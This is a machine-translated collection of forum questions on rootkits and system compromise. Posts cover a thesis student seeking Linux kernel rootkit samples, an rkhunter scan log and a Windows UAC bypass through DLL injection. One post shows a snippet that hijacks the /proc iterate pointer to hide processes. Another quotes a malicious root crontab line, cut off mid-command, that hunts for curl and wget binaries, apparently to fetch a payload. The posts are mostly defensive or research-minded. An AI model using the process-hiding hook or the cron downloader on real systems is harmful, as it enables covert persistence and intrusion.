我正在研究Linux内核Rootkit检测的一些新技术作为我的论文.我需要一些rootkit样本来测试我的方法,还做一些机器学习测试.但是,在计算机历史书籍中也可以找到包装风暴中的旧尘埃.我已经阅读了很多关于它的内容,我在phrack和其他一些资源中看到了一些rootkit实现的新方法.我需要花费大量时间才能为他们实现PoC rootkit,到那时我才能到达项目的起点.
如果有人能帮助我,我将不胜感激.任何站点,ftp,受损系统,未知的rootkit库,任何可能是我的工作样本的东西都表示赞赏.但考虑到这一点,我需要的是Linux内核Rootkit.任何类型,LKM,系统调用挂钩,对象挂钩,system.map/dev/mem工作的东西
谢谢
ps by new rootkits我不是说非报告或全新的rootkit,可以在ubuntu 10.04或更新版本上工作的东西会很棒(内核版本2.6.32+)
从用户隐藏进程的一种流行方法是劫持/ proc目录的iterate函数.这可以按如下方式完成:
struct file *filep = filp_open("/proc", O_RDONLY, 0));
filep->f_op->iterate = p // We swap the pointer with our hacked iterate
我正在研究一种检测方法,我希望恢复原始的迭代功能(假设它已经被劫持).有没有办法找到用于/ proc目录的原始迭代函数?
我最近遇到了这本名为The Rootkit Aresenal的书,由Bill Blunden提供了详细的(我的意思是!)描述了rootkit的基础知识,并且还介绍了如何为Windows设计它们(所以它需要对IA32-有一些基本的了解 -内部).因为我主要关注以Linux为中心的安全性,所以我只能使用本书获得基础知识,但不能使用与Linux内核相关的任何内容.任何人都可以建议一本针对Linux的Rootkit的龙书,它会给我一些实践经验吗?
万一有人要问我这个问题:
"你为什么看着rootkit?这不是很糟糕吗?"
slashdot上有人说过:
如果我们不了解可以攻击的方式,我们如何实施安全性?
只是想知道我在寻找什么:如果引用的目录看起来像下面只用Linux rootkit而不是Windows替换就足够了.
我变得偏执,同时运行chkrootkit和rkhunter来扫描rootkit。看起来chkrootkit没发现任何东西,但是rkhunter返回了一些警告。我认为可能有很多误报,但我最担心的是“可能的rootkit字符串”和三个可疑文件。任何解释将不胜感激!谢谢!
Performing file properties checks
/usr/bin/fuser [ Warning ]
/usr/bin/whatis [ Warning ]
/usr/bin/shasum [ Warning ]
Performing additional rootkit checks
Checking for possible rootkit strings [ Warning ]
Performing checks on the network interfaces
Checking for promiscuous interfaces [ Warning ]
Performing system boot checks
Checking for system startup files [ Warning ]
Performing system configuration file checks
Checking if SSH root access is allowed [ Warning ]
Checking if SSH protocol v1 is allowed [ Warning ]
Performing …从2009年7月的一篇名为Inside Windows 7用户帐户控制的 Technet文章中,Mark Russinovish描述了以标准用户身份运行的应用程序可以默默地提升并获得管理权限:
...在具有标准用户权限的PA(受保护管理员)帐户中运行的第三方软件可以利用自动提升来获得管理权限.例如,软件可以使用 WriteProcessMemory API将代码注入资源管理器,使用 CreateRemoteThread API执行该代码,这是一种称为DLL注入的技术.由于代码在资源管理器中执行,这是一个Windows可执行文件,它可以利用自动提升的COM对象(如复制/移动/重命名/删除/链接对象)来修改系统注册表项或目录,并为软件提供管理权利.
他接着提到恶意软件永远不会这样做,因为它太难了:
......这些步骤需要刻意的意图,不是微不足道的......
最后
...恶意软件可以使用相同的技术获得管理权限.
所以我很想看到一个实际的实现.
我原以为PROCESS_VM_WRITE不是标准用户的权利.
注意:我自己永远不会做任何不好的事情,对世界上其他所有开发者来说也是如此.
我收到了很多来自cron作业的电子邮件,这些邮件看起来真的很奇怪,所以我去调查了。
我在下面发现了一个奇怪的crontab条目。
首先,我尝试运行:
crontab -u root -l
那显示了大型cron作业,因此我立即删除了该条目。
*/11 * * * * root tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f …